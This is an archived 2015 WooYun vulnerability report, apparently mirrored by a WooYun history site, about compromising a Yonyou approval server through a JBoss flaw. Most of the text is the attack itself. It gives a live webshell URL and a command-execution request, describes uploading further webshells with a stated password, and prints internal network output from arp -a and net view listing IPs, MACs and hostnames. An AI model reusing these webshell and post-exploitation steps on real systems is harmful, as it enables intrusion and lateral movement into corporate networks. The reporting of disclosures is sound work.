乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-16: 细节已通知厂商并且等待厂商处理中 2015-10-21: 厂商已经主动忽略漏洞,细节向公众公开
已shell可威胁内网
http://shenpi.yonyou.com
小马地址:
http://shenpi.yonyou.com/jbossass/jbossass.jsp
该小马的用法
GET http://shenpi.yonyou.com/jbossass/jbossass.jsp?ppp=whoami HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: jexbossAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: shenpi.yonyou.comPragma: no-cacheCookie: JSESSIONID=EBC96181BA0709FA6A30DC02674028E5
利用该命令马先传个上传马http://shenpi.yonyou.com/download/wpp.jsp再传个一句话http://shenpi.yonyou.com/download/wpp1.jspx密码:woo0yun
进服务器
C:\YONYOUMA\NCMA\UFIDA_NCMA_SERVER\server\default\.\deploy\download.war\> arp -a接口: 10.10.5.170 --- 0xb Internet 地址 物理地址 类型 10.10.5.1 3c-e5-a6-b0-e7-57 动态 10.10.5.47 00-50-56-83-3e-08 动态 10.10.5.53 00-50-56-83-00-20 动态 10.10.5.67 00-50-56-83-00-2b 动态 10.10.5.69 00-50-56-83-00-2d 动态 10.10.5.80 00-50-56-83-00-32 动态 10.10.5.103 00-50-56-83-00-3a 动态 10.10.5.126 00-50-56-83-5e-37 动态 10.10.5.150 90-b1-1c-3f-e0-f0 动态 10.10.5.171 00-50-56-83-7e-d5 动态 10.10.5.173 00-50-56-83-7e-d7 动态 10.10.5.181 00-50-56-83-54-2c 动态 10.10.5.182 00-50-56-83-54-2d 动态 10.10.5.183 00-50-56-83-54-2e 动态 10.10.5.184 00-50-56-83-0c-f2 动态 10.10.5.185 00-50-56-83-54-30 动态 10.10.5.210 00-50-56-83-00-0a 动态 10.10.5.229 00-50-56-83-6d-ed 动态 10.10.5.231 00-50-56-83-75-4e 动态 10.10.5.237 00-50-56-83-4e-ef 动态 10.10.5.252 00-50-56-83-0c-33 动态 10.10.5.255 ff-ff-ff-ff-ff-ff 静态 224.0.0.22 01-00-5e-00-00-16 静态 224.0.0.252 01-00-5e-00-00-fc 静态 238.0.0.1 01-00-5e-00-00-01 静态 238.0.0.252 01-00-5e-00-00-fc 静态 C:\YONYOUMA\NCMA\UFIDA_NCMA_SERVER\server\default\deploy\download.war\> net view服务器名称 注解-------------------------------------------------------------------------------\\10-10-5-210-ORA 10-10-5-210-ora \\BANK71 \\BPM \\GBU_KHFWZX_10_2 \\GZW02 \\GZW03 \\JTCW_2012_57 \\MERP-11-6 \\MERP-2011-01 \\ORDERTEST-02 \\RUM \\U8ZCFTPNEW u8zcftpnew \\UF03SERVER \\UFBANK18-C7DE7C \\UFBANK183 \\UFBANK201105 \\US2008R2 \\WIN-0SEOVGEM7PS \\WIN-1T04B4N6LCR \\WIN-2L4DKCPKEJK \\WIN-3ULFN1SM94G \\WIN-40NAHFQUNK0 \\WIN-43L7BI4HQAH \\WIN-50569VGC3I0 \\WIN-52VNJC0PPJ3 \\WIN-9MDUC25IH1B \\WIN-C11NMEK2NJF \\WIN-C2Q2BHLQGAB \\WIN-EIJN1GV4PP0 \\WIN-HQOGR4VHK2E \\WIN-HRKR1J13R9Q \\WIN-IEFRG0HT352 \\WIN-NPCNBIFHIHS \\WIN-PINENM2P32O \\WIN-Q2B6RUDSSBR \\YCXFWZX-2011-01 \\YONYOU-0FAFBA45 \\YYWECHATSERVER yywechatserver 命令成功完成。
admin权限可内网喲
#删除shell
危害等级:无影响厂商忽略
忽略时间:2015-10-21 10:02
漏洞Rank:15 (WooYun评价)
暂无